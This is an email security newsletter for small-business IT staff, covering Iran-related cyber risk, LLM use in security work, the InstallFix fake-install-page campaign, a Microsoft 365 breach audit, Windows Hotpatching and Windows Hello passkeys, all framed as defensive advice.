Table of Contents
Iran War: Prepare for New Cyber Risks
The Multi-State Information Sharing and Analysis Center (MS-ISAC) warns that U.S. state and local groups face a wave of "low-level cyber activity." This follows recent U.S. and Israeli military strikes in Iran.
Why it matters: While these groups are the primary targets, SMBs often share the same digital space and face similar risks.
The big picture: Even if your business is not a direct target, geopolitical tension often leads to a rise in automated and opportunistic attacks. While large companies are major targets, SMBs are often used as "entry points" because they often have smaller security budgets and fewer defenses.
The details: Experts expect a rise in specific types of digital threats:
DDoS attacks: These flood your website or network with traffic to knock it offline.
Website defacement: Hackers change the look of your site to spread messages.
Data leaks: Increased attempts to steal info about employees or organizations.
What you can do: Use this moment to check your passive, preventative controls, such as:
Patch your systems: Ensure all software is up to date, especially VPNs and routers.
Use firewalls: Strong firewalls can stop most low-level attacks.
Clean up your data: Limit what information about your staff is public. Encourage employees to review and scrub social media accounts for sensitive details.
Verify inputs: Check data from web forms to prevent "SQL injection" attacks.
Deploy phish-resistant MFA: Mitigates most account takeover threats.
Keep paper copies: Print out your most critical documents in case your cloud services or internet go down.
The bottom line: Even if we haven’t seen major attacks on local systems yet, the risk is real. Now is the time to harden your defenses before the situation changes.
AI tools boost security for small teams
The big picture: Security work involves a lot of reading, writing, and coding. Modern AI tools are becoming essential "co-pilots." They help you analyze alerts, handle complex security logs and script creation without needing a full team of developers.
Why it matters Small and medium businesses (SMBs) often lack the huge budgets of large corporations. Using Large Language Models (LLMs) like Claude or ChatGPT can help IT professionals automate boring tasks and analyze data faster.
Practical ways to use LLMs
Analyzing code and logs: You can feed snippets of suspicious code or server logs into an AI to find errors or signs of an attack quickly.
Writing scripts: If you need a Python script to automate a security check but don’t have time to write it from scratch, an LLM can generate a working draft in seconds.
Drafting documents: Use AI to help write security policies or employee training guides. This saves hours of manual writing.
Learning on the fly: When you encounter a new type of cyber threat, you can ask an LLM to explain the concept in simple terms.
Yes, but: While these tools are powerful, they aren't perfect. They can sometimes give wrong answers, known as "hallucinations." Always verify the code or advice an AI gives you before applying it to your live systems.
What to do now
Pick a tool: Start with a well-known AI like Claude or ChatGPT to see how it handles your daily tasks.
Protect your data: Never upload sensitive company secrets, passwords, or customer private data into a public AI tool.
Review everything: Treat AI output like a draft from an intern. Check it for mistakes before you use it.
Go deeper: For some example prompts, check out https://dispatch.thorcollective.com/p/how-i-use-llms-for-security-work
InstallFix: Malicious ads mimic software guides
The big picture: A new cyberattack called “InstallFix” is tricking people into installing malware. Attackers create fake websites that look exactly like real software help pages. They use Google ads to make these fake pages show up at the top of search results.
How it works: When you search for popular tools, like AI coding assistants, you might see a sponsored link. If you click it, you land on a page that looks official. The page tells you to copy a line of code and paste it into your computer's command terminal to install the software.
The trap: The code you copy doesn't install software. Instead, it downloads a "stealer" virus.
The goal: This virus steals your saved passwords, web cookies, and login details.
Why it matters: This attack is hard to stop because it doesn't use email, so it skips your email filters. Because you are the one asking to install the software, your computer’s security tools might not realize anything is wrong until it is too late.
What you can do:
Check the URL: Before you copy any commands, look closely at the web address. Make sure it is the official site (like
anthropic.comorgithub.com).Skip the ads: Don't click on sponsored search results for software. Scroll down to the organic results or go directly to the official website.
Verify the code: If a command asks your computer to download something from a weird or long web link, don't run it.
The bottom line: Cybercriminals are getting better at looking professional. Always double-check where you are getting your software before you run any commands on your machine.
Go deeper: https://pushsecurity.com/blog/installfix
A $71K lesson in Microsoft 365 security
The big picture: Weak security settings in Microsoft 365 (M365) led to a $71,000 theft and a data breach involving children's personal information at Western Australian government agencies. A recent audit found that basic safety tools were either missing or turned off.
Why it matters: For SMB IT professionals, this is a clear warning. Many of these issues come from "out-of-the-box" settings that are too permissive. If you don't tighten these controls, adversaries have a higher chance of breaching your environment.
Key details
The $71k theft: Hackers used weak Multi-Factor Authentication (MFA) to log in from overseas. They set up hidden email rules to watch the inbox and eventually sent fake invoices that were paid by mistake.
The data breach: One agency sent sensitive data about 32 people, including minors, to a third party. Because they had no Data Loss Prevention (DLP) tools, they couldn't see what was stolen or stop it.
Shadow IT: Employees were allowed to sync work data to personal accounts on Dropbox and Google Drive, creating huge gaps in data control.
Unvetted apps: Staff could install unapproved Teams apps and external code, which could hide malware.
What to do next
Enforce phishing-resistant MFA: Move away from SMS, email codes, or one-time passwords (OTP). Use hardware keys or passkeys to stop adversaries from hijacking accounts.
Turn on DLP: Set up Data Loss Prevention rules in M365 to flag or block emails containing ID numbers, health records, or financial data.
Audit guest access: Review your settings to ensure only admins can invite guests to your digital workspace.
Block personal storage: Use technical controls to prevent staff from moving work files to personal cloud accounts.
Microsoft to enable Windows Hotpatching by default
The big picture: Starting in May 2026, Microsoft will turn on Hotpatch security updates by default for all eligible Windows devices managed via Microsoft Intune or Graph API. This change allows devices to install security fixes without requiring a restart.
Why it matters: For SMB IT and security pros, patching is often a race against time.
Faster compliance: Data shows that hotpatching helps organizations reach 90% patch compliance in half the time compared to traditional methods.
Less downtime: Because updates apply in memory, users aren't forced to reboot in the middle of their workday.
Reduced risk: Faster patching closes security gaps before attackers can exploit them.
How it works: Hotpatching works by updating code in a running process without needing to restart the OS.
The Baseline: Every three months, a baseline update is released that does require a reboot.
The Hotpatch: In the months between baselines, security updates are applied hot (no restart required).
Yes, but: this feature requires specific prerequisites. Devices that don't meet these requirements will continue to use the standard restart-required method.
Windows Hello to support passkeys
The big picture: Microsoft is making it harder for adversaries to steal your login info. Soon, you can use Windows Hello (face, fingerprint, or PIN) to sign in to Microsoft Entra apps using a Windows device bound passkey.
Why it matters: Adversaries often use fake websites to steal passwords and weak MFA challenge answers. This is called phishing. Passkeys are much safer because they stay on your specific device. They don't work on fake sites, which keeps your account safe.
How it works - no password needed: Users sign in using the same PIN or scan they use for their laptop.
Works anywhere: You can use these passkeys on managed company PCs or unmanaged personal devices.
One device, many accounts: A user can have separate passkeys for multiple Entra accounts on the same computer.
Stays put: These passkeys are "device-bound." They don't sync to the cloud, so they can’t be stolen from another machine.
When: Public preview starts in mid-March 2026. It will be fully available by mid-April 2026.
Is It Automatic? No. This feature is off by default. You must opt in and change your settings to use it.
Current Limits: During the preview, you have to manually add specific ID codes (AAGUIDs) for Windows Hello to your allowed list in the Entra portal.
What’s next: If you want to try this - go to your Authentication Methods in the Microsoft Entra admin center. You’ll need to enable "Passkeys (FIDO2)" and create a profile for your users. If you aren't ready to change how your team signs in, you don't need to do anything right now.
Go deeper: https://mc.merill.net/message/MC1247893
If you have any comments or feedback, just respond to this email!
Thanks for reading and stay secure,
Aaron